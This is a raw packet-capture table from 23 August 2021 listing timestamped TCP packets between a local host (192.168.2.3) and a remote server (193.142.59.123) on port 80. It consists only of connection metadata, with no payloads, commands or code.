Aug 23, 2021 02:08:38.259696007 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259718895 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259721041 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259746075 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259747982 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259768963 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259793043 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259793043 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259815931 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259835958 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259843111 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259865999 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259866953 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259890079 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259913921 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259915113 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259936094 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.259937048 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259959936 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.259984970 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260008097 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260030031 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260050058 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260055065 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260070086 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260077000 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260091066 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260118961 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260128975 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260150909 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260152102 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260170937 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260190010 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260195017 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260227919 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260227919 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260248899 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260270119 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260270119 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260289907 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260312080 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260313034 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260334969 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260337114 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260360003 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260380030 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260385990 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260411024 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260415077 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260433912 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260453939 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260457039 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260479927 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260493040 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260503054 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260524035 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260526896 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260550976 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260556936 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260577917 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260582924 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260601997 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260626078 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260633945 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260649920 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260667086 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260673046 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260694981 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260713100 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260716915 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260735989 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260741949 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260767937 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260773897 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260792017 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260796070 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260813951 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260823011 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260834932 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260852098 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260855913 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260874987 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260893106 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260894060 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260914087 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260932922 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260936975 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260967016 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260979891 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.260998011 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.260999918 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.261022091 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.261046886 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.261085033 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.268802881 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.270009995 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.286426067 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.286453962 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.286477089 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.286573887 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.291898966 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.291930914 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.291954041 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.291979074 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292002916 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292013884 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.292023897 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292056084 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292078018 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292082071 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.292099953 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292146921 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292170048 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292191029 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292203903 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.292220116 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292243958 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292284012 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.292287111 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292314053 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292347908 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.292356968 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292382002 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292408943 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292435884 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292444944 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.292460918 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292484999 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292490959 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.292505026 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292525053 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292526960 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.292546034 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292553902 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.292566061 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292588949 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292598009 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.292610884 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292633057 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292654037 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292671919 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292680979 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.292697906 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292712927 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.292723894 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292751074 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292756081 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.292774916 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292793989 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292804956 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.292820930 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292835951 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.292845964 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292867899 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292884111 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.292892933 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292912006 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292932987 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292933941 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.292954922 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292960882 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.292978048 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.292999983 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293015003 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.293025970 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293051958 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293066978 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.293076992 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293101072 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293116093 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.293121099 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293142080 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293167114 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293176889 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.293185949 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293211937 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293236017 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.293250084 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293257952 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.293272972 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293298006 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293309927 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.293318987 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293339968 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293363094 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293375015 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.293387890 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293411016 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293411016 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.293436050 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293451071 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.293462992 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293488026 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293497086 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.293514013 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293536901 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.293539047 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293561935 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293587923 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293593884 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.293612957 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293632030 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293657064 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.293675900 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293698072 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293723106 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293732882 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.293745041 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293766975 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293776989 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.293795109 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293827057 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293829918 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.293849945 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293864965 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.293873072 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293894053 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293899059 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.293917894 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293941021 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293953896 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.293965101 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.293989897 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294001102 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.294013023 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294034958 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294054985 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294064045 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.294079065 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294083118 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.294102907 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294126034 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294135094 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.294151068 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294178963 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294205904 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294217110 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.294229984 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294253111 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294260979 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.294277906 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294286966 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.294297934 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294318914 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294333935 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.294339895 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294364929 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294375896 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.294389963 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294409990 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294433117 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294441938 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.294455051 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294478893 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294487000 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.294506073 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294517994 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.294529915 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294555902 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294560909 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.294579029 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294600964 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294612885 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.294626951 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294646978 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294668913 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294680119 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.294687986 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294711113 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294737101 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.294737101 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294756889 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.294760942 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294780016 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.294781923 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294802904 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294825077 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294836044 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.294847965 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294869900 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294886112 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.294891119 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294918060 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294939041 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294948101 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.294962883 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.294995070 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.295007944 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295032978 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295047998 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.295053959 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295078039 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295090914 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.295103073 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295145988 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.295156956 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295181036 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295221090 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295239925 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295243979 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.295263052 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295279026 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.295286894 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295312881 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295339108 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295346975 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.295361042 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295382977 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.295387030 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295409918 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295417070 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.295433998 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295458078 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295483112 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.295485020 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295509100 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295521975 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.295532942 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295555115 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295569897 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.295582056 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295610905 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295622110 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.295634985 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.295686007 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.300030947 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.301268101 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.301274061 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:38.317455053 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.317481041 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.317523003 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.317545891 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:38.317576885 CEST	49735	80	192.168.2.3	193.142.59.123
